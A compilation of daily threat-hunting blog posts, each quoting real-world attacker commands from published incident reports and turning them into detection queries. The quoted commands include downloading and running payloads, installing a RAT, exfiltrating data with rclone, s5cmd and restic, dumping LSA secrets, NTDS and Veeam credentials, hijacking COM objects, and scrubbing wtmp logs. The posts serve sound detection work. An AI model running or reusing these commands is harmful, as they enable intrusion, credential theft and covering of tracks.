Know Your Adversary

Hello everyone! Remote Access Tools (T1219) is still a very common technique observed in many campaigns and incidents. According to Red Canary's Intelligence Insights for August 2025, the most prevalent threat was NetSupport RAT , so let's look at various detection opportunities. As always, adversaries may rename executables. So we can search for rename NetSupport executables: event_type: "processcreatewin" AND proc_file_productname: "netsupport" AND NOT proc_file_path: "client32.exe" Next thing, normally the RAT should start from the Program Files directory, so we can search for running it from other folders: event_type: "processcreatewin" AND proc_file_path: "client32.exe" AND NOT proc_file_path: "program files" Finally, we can look for network indicators: event_type: "dnsreqwin" AND dns_rname: "netsupportsoftware.com" See you tomorrow!

Hello everyone! Another useful idea for threat hunting is searching for unusual file types executed via system binaries as part of  System Binary Proxy Execution (T1218) technique. Yesterday Huntress blogged about a curious example of FileFix technique used by an adversary to deliver and execute MetaStealer. As part of the kill chain, a victim should run an LNK file, which would execute the following command: %comspec% /k "start msedge hXXps://anydesk[.]com/en/downloads/windowslatest & curl -sLo %TEMP%\%COMPUTERNAME%6.pdf hXXps://%COMPUTERNAME%6.chat1[.]store/update/6.pdf & msiexec /i %TEMP%\%COMPUTERNAME%6.pdf /qn & taskkill /f /im cmd.exe" And what do we see here? The adversary used msiexec.exe to execute a PDF file (which is actually an MSI installer, of course). And we can hunt for similar behaviors: event_type: "processcreatewin" AND proc_file_name: "msiexec.exe" AND cmdline: *pdf See you tomorrow!

Hello everyone! ClickFix technique becomes more and more popular, and is now a part of arsenal of even state-sponsored adversaries. Today we'll look at how Lazarus (or Lazer Werewolf ) leverages this technique, and extract hunting opportunities. So, the adversary used the following command: curl -k -o "%TEMP%\nvidiaRelease.zip" hXXps://driverservices[.]store/visiodrive/nvidiaRelease.zip && powershell -Command "Expand-Archive -Force -Path '%TEMP%\nvidiaRelease.zip' -DestinationPath '%TEMP%\nvidiaRelease'" && wscript "%TEMP%\nvidiaRelease\run.vbs" Here we have at least three hunting opportunities. The first one, using cURL to download a file to a temp folder. I included the arguments used by the threat actors (-k ignores SSL certificate errors; -o specifies output file path): event_type: "processcreatewin" AND proc_file_path: "curl.exe" AND cmdline: ("k" AND "o" AND "temp"...

Hello everyone! We already talked about abusing forensic and incident response tools. Let's look at a curious example of how adversaries leverage such software instead of Remote Access Tools (T1219) . According to Sophos report , an adversary leveraged  Velociraptor , which was configured to communicate with C2 server velo[.]qaubctgg[.]workers[.]dev .  Yes, you may even use Velociraptor in your environment, but it's unlikely be configured to communicate with workers[.]dev domains. And we can use it to build the query: event_type: "dnsreqwin" AND dns_rname: "workers.dev" AND proc_file_path: "velociraptor.exe" See you tomorrow!

Hello everyone! Do you remember PowerShell has almost countless number of procedures? So today we'll look at another one, which includes the following technique:  Event Triggered Execution: Component Object Model Hijacking (T1546.015) . This time the example we are going to look at belongs to Head Mare (or Rainbow Hyena). One more time the adversary leveraged malicious LNK files in order to execute the following PowerShell command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -c "New-Item -Path 'HKCU:\Software\Classes\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\InprocServer32' -Force|Set-Item -Value 'C:\ProgramData\winnt64_.dll';$r=[System.IO.Path]::Combine($(gl).Path,'Задание_на_оценку_N_2046_от_05_августа_2025_года.zip');if(Test-Path $r){[System.IO.File]::WriteAllBytes([System.IO.Path]::Combine($env:ProgramData,'winnt64_.dll'),([System.IO.File]::ReadAllBytes($r)|select -Skip 16 -First 642064));}el...

Hello everyone! There're lots of LOLBAS, but are all of them used in-the-wild? Let's look how real adversaries abuse Extensible Wizards Host Process for  Ingress Tool Transfer (T1105) . So, Extensible Wizards Host Process can be used by adversaries to download a malicious file from a remote server. Here's an example  related to FormBook : XwIZarD.exe  RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /z hXXps://gbuarts[.]com/cc/Protected.exe For example, we can look for xwizard.exe executions with "http" among command line parameters: event_type: "processcreatewin" AND proc_file_path: "XwIZarD.exe" AND cmdline: *http* See you tomorrow!

Hello everyone! In many cases adversaries are deobfuscating or decoding downloaded or dropped payloads. Of course, they often use LOLBAS for it. So let's look at an example of  Deobfuscate/Decode Files or Information (T1140) . As always, we need some procedure examples. And we'll extract it from this report on  Ghostwriter . Here're a few examples of how the threat actors abuse expand.exe : "C:\Windows\System32\expand.exe" "C:\Users\<USER>\AppData\Local\Temp\sdw9gobh0n" "C:\Users\<USER>\AppData\Local\Logs\sdw9gobh0n.log" "%windir%\System32\expand.exe" %ProgramData%\OfficeRuntimeBroker.xlam %ProgramData%\~OfficeRuntimeBroker.dat Usually it's used with CAB files, so we can search for executions without this file type among command line arguments: event_type: "processcreatewin" AND proc_file_path: "expand.exe" AND NOT cmdline: *cab Tune it based on your own telemetry! For example, you may also need to...

Hello everyone! Let's talk a bit about defense evasion. But not Windows. And not Linux. Today we're going to look at a procedure related to the following technique:  Subvert Trust Controls: Gatekeeper Bypass (T1553.001) . And we'll look at  SHAMOS , a variant of Atomic macOS Stealer (AMOS). To bypass Gatekeeper checks, it clears all attributes using xattr: sudo -S xattr -c /tmp/update We can hunt for clearing attributes for suspicious files located under /tmp : event_type: "processcreatemac" AND proc_file_path: "xattr" AND cmdline: ("c" AND "tmp") See you tomorrow!

Hello everyone! There're lots of legitimate binaries used by threat actors as a part of ClickFix. PowerShell, Windows Command Shell, mshta... But today we'll look at the following technique:  System Binary Proxy Execution: Msiexec (T1218.007) . This time the adversary abused msiexec to install NetSupport RAT to the compromised system: msiexec /i hXXps://cf-2-up[.]com/res/skirthub /qn 87af19ba=a296378a+606fc0b0*05a130cd(980b6676^174d7ea5*b01eaa45 For example, we can look for msiexec running files without .msi extension from a remote server: event_type: "processcreatewin" AND proc_file_path: "msiexec.exe" AND cmdline: *http* AND NOT cmdline: *msi* See you tomorrow!

Hello everyone! Adversaries always want to hide their malicious activities. Some hiding techniques are common, while others are not. Let's look at one of them -  Hide Artifacts: Bind Mounts (T1564.013) . According to this report , MountBot has the following code: mount('/proc/1', '/proc/self', 0, MS_BIND, 0); And this is an example how adversaries abuse bind mounts on file structures to hide their activity! Of course, we can hunt for suspicious executions of mount: event_type: "processcreatenix" AND proc_file_path: "mount" AND cmdline: ("bind" AND "proc") See you tomorrow!

Hello everyone! Yesterday we looked at how Qilin ransomware gang abused s5cmd to exfiltrate sensitive data from compromised systems. Today we'll look at abother example to understand that the same detections may be applied to various cases. This time we'll look at another very popular tool for data exfiltration - rclone . Here's how Warlock used this tool: TrendSecurity[.]exe copy \\{UNC Path}\ mydrive:/client_42 --protondrive-username [Email] --protondrive-password [Password] -P --include "*.{txt,pdf,csv,accdb,doc,docx,xlsx,mdf,sql,doc,xls,sql,jpg,png,jpeg,sqlite,db,sqlite3,sdf,ndf,ldf,csv,mdf,dbf,ibd,myd,ppt,pptx}" -q --ignore-existing --auto-confirm --multi-thread-streams 11 --transfers 11 --max-age 200d --max-size 3000m As you can see, here we have very similar command line arguments, so we can use the same query: event_type: "processcreatewin" AND cmdline: ("include" AND "pdf" AND "xls" AND "doc") See you tom...

Hello everyone! Data exfiltration. Almost every ransomware-related incident includes this stage. And adversaries often experiment with various free tools to evade defenses. And today we're going to talk about the following technique: Transfer Data to Cloud Account (T1537) . Huntress noted that in a recent Qilin ransomware attack the adversary used s5cmd for exfiltration: s5cmd  --credentials-file credentials cp --include "*.pdf" --include "*.png" --include "*.jpg" --include "*.jpeg" --include "*.xls" --include "*.xlsx" --include "*.tif" --include "*.zip" --include "*.doc" --include "*.docx" "[Folder]" s3://[Resource] For detection, we can use, for example, popular file types: event_type: "processcreatewin" AND cmdline: ("include" AND "pdf" AND "xls" AND "doc") See you tomorrow!

Hello everyone! Nowadays adversaries often abuse Telegram to make it a C2 channel. But in some cases it's even more interesting. Today we'll talk about the following technique:  Web Service: Dead Drop Resolver (T1102.001) . And we'll look at a stealer with a quite funny name - Noodlophile . The adversary leveraged scripts, which extracted a part of URL from the description of a Telegram group. For example, " Gc2BJ ". To store the payload the threat actors used paste[.]rs , so the final URL would be  hXXps://paste[.]rs/Gc2BJ . So, why not to hunt for suspicious connections to paste[.]rs ? event_type: "dnsreq" AND dns_rname: "paste.rs" See you tomorrow!

Hello everyone! Adversaries always abuse legitimate utilities, for example, curl and wget , to download malware and tools to the compromised system. But today we'll look at a more rare tool used for Ingress Tool Transfer (T1105) . I'm talking about BITSAdmin. I don't see it used by adversaries very often, but still there are a few examples. One of them - Scaly Wolf . The threat actors leveraged BITSAdmin to download a Meterpreter loader: powershell  -Command "bitsadmin /transfer "DownloadJob" "hxxps[:]//roscosmosmeet[.]online/shellcode.exe" "$env:USERPROFILE\Pictures\zabix.exe"" As it's not commonly used, we can hunt for BITSAdmin executions with /transfer argument: event_type: "processcreatewin" AND proc_file_path: "bitsadmin.exe" AND cmdline: "transfer" See you tomorrow!

Hello everyone! Windows Registry contains lots of sensitive information and configurations, so adversaries often interact with it. Today we'll look at two examples! And we'll extract both procedures from this report . The first technique is Registry Modification (T1112) . The adversary used it to disable User Account Control (UAC) restriction: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f We can build detection based on reg.exe abuse or just value modification itself: event_type: "registryvalueset" AND reg_key_path: "LocalAccountTokenFilterPolicy" AND reg_value_data: "0x00000001" The second technique -  Unsecured Credentials: Credentials in Registry (T1552.002) . The adversary queried the Registry to obtain VNC credentials: reg query "HKCU\Software\ORL\WinVNC3\Password" Let's build the detection based on reg.exe abuse this time: event_type: "processcr...

Hello everyone! Discovery is a perfect attack stage for your threat hunting mission! And today we'll look how adversaries abuse wmic to collect system information - Windows Management Instrumentation (T1047) . If we look at behaviors related to KiwiStealer , we can see that it executes multiple discovery commands with wmic: wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName wmic cpu get name wmic csproduct get name wmic nic where NetEnabled=true get MACAddress wmic os get caption As you can see, the adversary collects information about antivirus software, CPU, device model, network adapters and operating system. Let's use all of this to build a hunting query: event_type: "processcreatewin" AND proc_file_path: "wmic.exe" AND cmdline: ("AntiVirusProduct get displayName" OR "cpu get name" OR "csproduct get name" OR "get MACAddress" OR "os get caption") It may be (very) noisy, but proper...

Hello everyone! I'm sure you know that adversaries LOVE RDP. In most cases they use it for lateral movement. Today we'll look at the following technique:  Server Software Component: Terminal Services DLL (T1505.005) . According to this report on Crypto24 ransomware group, the adversary patched termsrv.dll to enable multiple simultaneous RDP connections. The threat actor also executed the following commands related to the DLL: takeown.exe /F C:\Windows\System32\termsrv.dll /A icacls.exe C:\Windows\System32\termsrv.dll /grant Administrators We can use it to build detection logic: event_type: "processcreatewin" AND proc_file_path: ("takeown.exe" OR "icacls.exe") AND cmdline: "termsrv.dll" We can also hunt for file modification events related to  termsrv.dll : event_type: "filewrite" AND file_path: "termsrv.dll" See you tomorrow!

Hello everyone! Let's look at another technique I don't see to be used ITW often. This time it's  OS Credential Dumping: LSA Secrets (T1003.004) . And I do it rarely, but we'll look into the same report . The adversary leveraged multiple commands to extract credentials, including the following: cmd.exe /C reg query HKLM\\Security\\Policy\\Secrets\\_SC_MSSQLSERVER\\CurrVal > C:\\Windows\\Temp\\KQPGjxdB.tmp 2>&1  cmd.exe /C reg query HKLM\\Security\\Policy\\Secrets\\_SC_MSSQLSERVER > C:\\Windows\\Temp\\AVFVmJxu.tmp 2>&1  cmd.exe /C reg query HKLM\\Security\\Policy\\Secrets > C:\\Windows\\Temp\\UHopbQrR.tmp 2>&1  Yes, the adversary abused reg.exe to extract LSA secrets from registry. So, we can hunt for similar behavior: event_type: "processcreatewin" AND proc_file_path: "reg.exe" AND cmdline: "Security\\Policy\\Secrets" See you tomorrow!

Hello everyone! I think everyone is tired of common persistence mechanisms. Startup folder, Run key, scheduled tasks, services... Let's look at something more interesting -  Event Triggered Execution: Component Object Model Hijacking (T1546.015) . As always, we need a real-world example. And I got one for you -  MucorAgent . The malware abuses reg.exe to modify registry and hijack the CLSID: reg add HKEY_USERS\<SID>\SOFTWARE\Classes\CLSID\{de434264-8fe9-4c0b-a83b-89ebeebff78e}\InprocServer32 /t REG_SZ /d "C:\\Windows\\System32\\mscoree.dll" /F  reg add HKEY_USERS\<SID>\SOFTWARE\Classes\CLSID\{de434264-8fe9-4c0b-a83b-89ebeebff78e}\InprocServer32 /v Assembly /t REG_SZ /d "TaskLauncher, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" /F  reg add HKEY_USERS\<SID>\SOFTWARE\Classes\CLSID\{de434264-8fe9-4c0b-a83b-89ebeebff78e}\InprocServer32 /v Class /t REG_SZ /d "TaskLauncher.TaskHandler" /F  reg add HKEY_USERS\<SID>\SOFTWARE\C...

Hello everyone! Ransomware gangs often collect and exfiltrate sensitive data from compromised systems to use it for double extortion. So let's talk about the following technique -  Exfiltration Over Web Service: Exfiltration to Cloud Storage (T1567.002) . Threat actors can use various web services, for example, gofile[.]io or legitimate backup tools - I think everyone seen at least an attack description with rclone in it. To evade detection, adversaries need to change their tool from time to time, and in some cases they approach it in an original way. For example,  Noberus ransomware gang leveraged Restic - another legitimate backup tool: CSIDL_COMMON_VIDEO\restic.exe -r rest:http://[REMOVED]:8000/ init [REMOVED] CSIDL_COMMON_VIDEO\ppp.txt CSIDL_COMMON_VIDEO\restic.exe -r rest:http://[REMOVED]:8000/ [REMOVED] CSIDL_COMMON_VIDEO\ppp.txt --use-fs-snapshot --verbose backup "CSIDL_SYSTEM_DRIVE\[REMOVED]" The tool doesn't have lots of metadata, but you still can use uniq...

Hello everyone! Today the technique we are going to look at is OS Credential Dumping: NTDS (T1003.003). I'm sure you've seen adversaries abuse  esentutl to get a copy of NTDS.dit , but what about wbadmin ? I think you've lots of reports on Akira ransomware attacks involving SonicWall recently. According to this report , the adversary leveraged  wbadmin  to dump NTDS.dit as well as SYSTEM and SECURUTY registry files: "C:\Windows\system32\wbadmin.exe" start backup -backupTarget:\\localhost\c$\ProgramData\ -include:C:\Windows\NTDS\NTDS.dit C:\Windows\System32\config\SYSTEM C:\Windows\System32\config\SECURITY -quiet If we want to look for  NTDS.dit dumping attempts, we can run the following query: event_type: "processcreatewin" AND proc_file_path: "wbadmin.exe" AND cmdline: "ntds.dit" See you tomorrow!

Hello everyone! We haven't talked about abusing PowerShell for some time. But let's do it again today as I spotted an interesting example. And we'll look at the following technique -  Screen Capture (T1113) . Let's look at  Efimer Trojan described in this report . The malware uses the following PowerShell command to capture screenshots: powershell.exe -NoProfile -WindowStyle Hidden -Command "$scale = 1.25; Add-Type -AssemblyName System.Drawing; Add-Type -AssemblyName System.Windows.Forms; $sw = [System.Windows.Forms.SystemInformation]::VirtualScreen.Width; $sh = [System.Windows.Forms.SystemInformation]::VirtualScreen.Height; $w = [int]($sw * $scale); $h = [int]($sh * $scale); $bmp = New-Object Drawing.Bitmap $w, $h; $g = [Drawing.Graphics]::FromImage($bmp); $g.ScaleTransform($scale, $scale); $g.CopyFromScreen(0, 0, 0, 0, $bmp.Size); $bmp.Save(\'' + path.replace(/\\/g, '\\\\') + '\', [Drawing.Imaging.ImageFormat]::Png); ' + '$g.Dispo...

Hello everyone! Command and Scripting Interpreter (T1059) is an extremely popular technique. As you know, often use Windows Command Shell (T1059.003) and PowerShell (T1059.001). But in some cases we can observe more interesting interpreters. For example, according to this report on SmartLoader, the adversary abused Lua (T1059.011) to run obfuscated malicious scripts. The threat actors distributed archives via GitHub repositores. Each archive contained LuaJIT executable and DLL, an obfuscated malicious Lua script and a batch file to run it. If you look through the archives, you can see that the DLL is named lua51.dll in all cases, so we use it for our hunting query: event_type: "imageload" AND file_path: "lua51.dll" See you tomorrow!

Hello everyone! Today we'll talk about privilege escalation. And focus on Access Token Manipulation (T1134) technique. As always, we need a real life example, right? Let's look into this report . The adversary leveraged  TokenUtils to steal tokens from all users and use those to execute commands with elevated privileges: TokenUtils.exe ListTokens TokenUtils.exe Execute -u “NT AUTHORITY\SYSTEM” -e whoami -c TokenUtils.exe Execute -u “NT AUTHORITY\SYSTEM” -e cmd.exe -c To hunt for the tool usage we can use, for example, the module name: event_type: "processcreatewin" AND cmdline: "ListTokens" See you tomorrow!

Hello everyone! Backups. One of the main targets of any ransomware gang. The can use it to inhibit recovery or to obtain sensitive data. But before it, they need to obtain access to this part of infrastructure. The DFIR Report shared details on Akira ransomware intrusion. To obtain credentials from Veeam server, the adversary used the PostgreSQL interactive terminal to dump credentials from the Veeam PostgreSQL database: psql.exe -U postgres --csv -d VeeamBackup -w -c "SELECT user_name,password,description,change_time_utc FROM credentials" For example, we can hunt for attempts to access credentials table: event_type: "processcreatewin" AND proc_file_productname: "postgresql" AND cmdline: "credentials" See you tomorrow!

Hello everyone! Using phishing emails to obtain the initial access to a Windows host is quite common technique. And we see such emails every day. But what about Linux? Let's look at an example! According to this report , APT36 leveraged malicious .desktop files to deliver Poseidon - a Mythic agent. These files were masqueraded to look like PDF documents, for example,  Document Details.pdf.desktop. In fact, such files are just shortcut files, but for Linux. So, if you have Linux workstations, it's a good idea to hunt for suspicious .desktop files: event_type: "processcreatenix" AND cmdline.keyword: /.*\.desktop\s.*/ See you tomorrow!

Hello everyone! Let's talk about stealers again. This time about PXA stealer. It's a Python-based stealer emerged in in late 2024. Let's look at a few behavior markers covered in a joint report by SentinelOne and Beazley Security. The first one - misusing certutil.exe to to decode a masquaraded file into a new encrypted archive: certutil -decode Document.pdf Invoice.pdf It's not common for this utility to decode PDF files, so we can use it to build our logic: event_type: "processcreatewin" AND proc_file_path: "certutil.exe" AND cmdline: ("decode" AND *pdf) The next behavior - abusing renamed WinRAR executable to unpack the archive: images.png x -ibck -y -poX3ff7b6Bfi76keXy3xmSWnX0uqsFYur Invoice.pdf C:\\Users\\Public Of course, here we can hunt for renamed executables: event_type: "processcreatewin" AND proc_file_originalfilename: "WinRAR.exe" AND NOT proc_file_path: *winrar* Make sure to check the report - you can fin...

Hello everyone! Do you remember I mentioned that rundll32.exe is my favourite threat hunting target? Let's look at another example! We'll look inside the report by eSentire on Interlock. The adversary abused rundll32.exe and Windows Shell Common Dll to run a malcious LNK file: rundll32 shell32.dll,ShellExec_RunDLL “<8_CHARS>.lnk” So, based on this, we can form a simple hypothesis: an adversary may use rundll32.exe and Windows Shell Common Dll to run a malcious LNK file: event_type: "processcreatewin" AND proc_file_path: "rundll32.exe" AND cmdline: ("shell32.dll" AND *lnk) There's another interesting rundll32.exe abuse example in the report. Can you find it? See you tomorrow!

Hello everyone! Scattered Spider keeps being very-very active, so it's important to track changes in their tactics, techniques and procedures. The threat actors often use RMMs, which are not used by other adversaries very often. For example, Pulseway. The group leverages this tool to obtain redundant access to a compromised network. To detect it, we, for example, can search for executables with "pulseway" in metadata: event_type: "processcreatewin" AND proc_file_productname: "pulseway" Also we can search for DNS queries related to its website: event_type: "dnsreqwin" AND dns_rname: "pulseway.com" See you tomorrow!

Hello everyone! Adversaries often delete logs. But in some cases we can see more sophisticated approach. For example, they can sanitize the logs. Let's look at the report on  CL-STA-0969 . They used utmpdump to dump the contents of the wtmp log file: utmpdump /var/log/wtmp >/var/log/wtmp.file Then they used sed to remove lines containing their IP address: sed -i '/<IP Address>/d' /var/log/wtmp.file And finally  utmpdump again: utmpdump -r /var/log/wtmp.file > /var/log/wtmp So, for example, we can search for suspicious utmpdump executions: event_type: "processcreatenix" AND proc_file_path: "utmpdump" AND cmdline: "wtmp" See you tomorrow!

Hello everyone! Lateral movement - another common tactic we see daily. Of course, in some cases the threat actors can start it almost immediately after gaining the initial access, while in others they need at least some preparations. For example, Secret Blizzard . The adversary modified registry to reduce the difficulty of lateral movement on the network. The following registry key: SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Profiles The threat actors modify the value Category  by setting it to 0 to sets the profile of the network to Private after the host has been rebooted. Of course, we can hunt for such modifications: event_type: "registryvaluesetwin" AND reg_key_path: "NetworkList\\Profiles" AND reg_value_data: "0x00000000" See you tomorrow!